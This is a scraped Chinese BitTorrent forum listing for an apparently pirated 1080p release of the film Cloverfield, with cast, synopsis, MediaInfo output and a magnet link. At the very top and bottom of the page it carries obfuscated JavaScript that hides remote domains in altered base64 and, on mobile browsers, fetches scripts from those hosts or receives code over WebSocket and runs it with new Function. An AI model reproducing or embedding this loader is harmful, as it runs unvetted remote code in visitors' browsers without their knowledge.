科洛弗档案[简繁字幕].Cloverfield.2008.BluRay.1080p.TrueHD.5.1.x265.10bit 8.93GB

版主小s 1月前 232

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 科洛弗档案 / 末世凶煞(港) / 苜蓿地 / 柯洛弗档案 / 1-18-08

◎片 名 Cloverfield

◎年 代 2008

◎产 地 美国

◎类 别 科幻 / 惊悚 / 灾难

◎语 言 英语 / 俄语

◎上映日期 2008-01-18(美国)

◎IMDb链接 https://www.imdb.com/title/tt1060277/

◎豆瓣评分 7.3/10 (75998人评价)

◎豆瓣链接 https://movie.douban.com/subject/2144242/

◎片 长 85 分钟

◎导 演 马特·里夫斯 Matt Reeves (id:1045032)

◎编 剧 德鲁·戈达德 Drew Goddard (id:1032271)

◎演 员 丽兹·卡潘 Lizzy Caplan (id:1009234)

杰西卡·卢卡斯 Jessica Lucas (id:1027216)

T·J·米勒 T.J. Miller (id:1248294)

迈克尔·斯塔尔·大卫 Michael Stahl-David (id:1170474)

迈克·沃格尔 Mike Vogel (id:1027793)

奥黛塔·安纳布尔 Odette Annable (id:1008064)

安居尔·尼加姆 Anjul Nigam (id:1132438)

玛戈特·法利 Margot Farley (id:1307591)

西奥·罗西 Theo Rossi (id:1146762)

布赖恩·克卢格曼 Brian Klugman (id:1050108)

游朝敏 Kelvin Yu (id:1362676)

莉萨·拉皮拉 Liza Lapira (id:1289436)

莉莉·米罗基尼克 Lili Mirojnick (id:1252684)

本·费德曼 Ben Feldman (id:1017951)

拉丝卡·马瑟 Rasika Mathur (id:1185053)

巴伦·沃恩 Baron Vaughn (id:1227971)

查琳·易 Charlyne Yi (id:1017832)

瑞克·欧弗顿 Rick Overton (id:1025338)

杰森·切尔博 Jason Cerbone (id:1069919)

帕沙·D.林奇尼科夫 Pasha D. Lychnikoff (id:1123535)

比利·布朗 Billy Brown (id:1352802)

斯科特·劳伦斯 Scott Lawrence (id:1105220)

蒂姆·格里芬 Tim Griffin (id:1351162)

克里斯·马尔基 Chris Mulkey (id:1048223)

苏珊·巴德 Susse Budde (id:1220830)

杰米·马尔茨 Jamie Martz (id:1119403)

迈克尔·阿克 Misha Bugaev (id:1238749)

凯利·比森 Caley Bisson (id:1169571)

汤米·格里茨 Tommy Gerrits (id:1259675)

詹姆斯·M·赫夫曼 James M. Huffman (id:1103540)

海森尼·约翰逊 Hisonni Johnson (id:1178791)

亚当·卡斯特 Adam Karst (id:1247215)

埃迪·马里亚诺 Eddie Mariano (id:1037792)

杰克·麦克劳克林 Jake McLaughlin (id:1247750)

马特·里夫斯 Matt Reeves (id:1045032)

小伯特兰·罗伯逊 Bertrand Roberson Jr. (id:1254362)

比利·布朗 Billy Brown (id:1279411)

唐·阿伯纳西 Don Abernathy (id:1432739)

约翰·罗伯特 John Robert (id:1432998)

J·J·艾布拉姆斯 J.J. Abrams (id:1010542)

布莱恩·伯克 Bryan Burk (id:1014367)

安娜·贝尔莫 Anna Behlmer (id:1278242)

内维尔·佩吉 Neville Page (id:1452461)

艾伦·米罗伊尼克 Ellen Mirojnick (id:1010099)

◎标 签 灾难 / 科幻 / 美国 / 惊悚 / 伪纪录片 / 美国电影 / DV / 2008

◎简 介

好友罗布(迈克尔?斯达-大卫 Michael Stahl-David 饰)要去日本工作,他的弟弟杰森(迈克?沃格尔 Mike Vogel 饰)和朋友莉莉(杰西卡?卢卡斯 Jessica Lucas 饰)为他举办了一场欢送派对。看到杰森拎着DV只顾拍摄美女玛莲娜(丽兹?卡潘 Lizzy Caplan 饰),莉莉很恼火,指出他更加关注罗布,因为后者才是今天的主角。

罗布姗姗来迟,并且感到没落。原来他跟好友贝丝(奥黛塔?雅丝曼 Odette Yustman 饰)的地下情刚刚告吹,这令他异常沮丧。正在此时,贝丝携新男友出现在派对现场,这令好友感到既尴尬又愤怒,而真正的地震危险正在悄悄逼近……

本片故事是采用伪DV风格的拍摄而成。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 325253785464999161190745353462418910587 (0xF4B199BA0E410E321B857F01AD6E2D7B)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.93 GiB

  8. Duration : 1 h 24 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 15.1 Mb/s

  11. Encoded date : UTC 2021-10-28 01:02:20

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 24 min

  21. Bit rate : 10.6 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.212

  31. Stream size : 6.25 GiB (70%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 10564 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=121811 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : MLP FBA

  45. Format/Info : Meridian Lossless Packing FBA

  46. Commercial name : Dolby TrueHD

  47. Codec ID : A_TRUEHD

  48. Duration : 1 h 24 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 463 kb/s

  51. Maximum bit rate : 5 445 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 1 200.000 FPS (40 SPF)

  56. Compression mode : Lossless

  57. Stream size : 2.05 GiB (23%)

  58. Title : English Dolby TrueHD 5.1 @ 4103 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 24 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 388 MiB (4%)

  77. Title : English Dolby Digital Audio 5.1 @ 640 kbps

  78. Language : English

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : AC-3

  85. Format/Info : Audio Coding 3

  86. Commercial name : Dolby Digital

  87. Codec ID : A_AC3

  88. Duration : 1 h 24 min

  89. Bit rate mode : Constant

  90. Bit rate : 192 kb/s

  91. Channel(s) : 2 channels

  92. Channel layout : L R

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 116 MiB (1%)

  97. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  98. Language : English

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Text #1

  103. ID : 5

  104. Format : PGS

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 1 h 11 min

  108. Bit rate : 53.2 kb/s

  109. Count of elements : 2351

  110. Stream size : 27.3 MiB (0%)

  111. Title : Eng/SUP

  112. Language : English

  113. Default : No

  114. Forced : No


  115. Text #2

  116. ID : 6

  117. Format : PGS

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 23 min

  121. Bit rate : 80.2 kb/s

  122. Count of elements : 3044

  123. Stream size : 47.6 MiB (1%)

  124. Title : Eng/SUP Commentary

  125. Language : English

  126. Default : No

  127. Forced : No


  128. Text #3

  129. ID : 7

  130. Format : PGS

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 12 min

  134. Bit rate : 29.9 kb/s

  135. Count of elements : 1870

  136. Stream size : 15.5 MiB (0%)

  137. Title : Chs/SUP 简体

  138. Language : Chinese

  139. Default : Yes

  140. Forced : No


  141. Text #4

  142. ID : 8

  143. Format : PGS

  144. Codec ID : S_HDMV/PGS

  145. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  146. Duration : 1 h 12 min

  147. Bit rate : 30.6 kb/s

  148. Count of elements : 1870

  149. Stream size : 15.9 MiB (0%)

  150. Title : Cht/SUP 繁体

  151. Language : Chinese

  152. Default : No

  153. Forced : No


  154. Menu

  155. 00:00:00.000 : en:第 01 章

  156. 00:05:03.470 : en:第 02 章

  157. 00:09:41.372 : en:第 03 章

  158. 00:15:02.360 : en:第 04 章

  159. 00:19:25.831 : en:第 05 章

  160. 00:24:21.835 : en:第 06 章

  161. 00:29:22.719 : en:第 07 章

  162. 00:33:35.472 : en:第 08 章

  163. 00:36:22.639 : en:第 09 章

  164. 00:41:25.274 : en:第 10 章

  165. 00:45:28.434 : en:第 11 章

  166. 00:49:15.995 : en:第 12 章

  167. 00:53:34.545 : en:第 13 章

  168. 00:59:08.170 : en:第 14 章

  169. 01:06:55.553 : en:第 15 章

  170. 01:13:44.045 : en:第 16 章




复制代码


TAGS 惊悚 科幻 灾难

磁力链:
  • magnet:?xt=urn:btih:FA76E863034F40120F6BBD7C71D47E89E6B47AA6

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};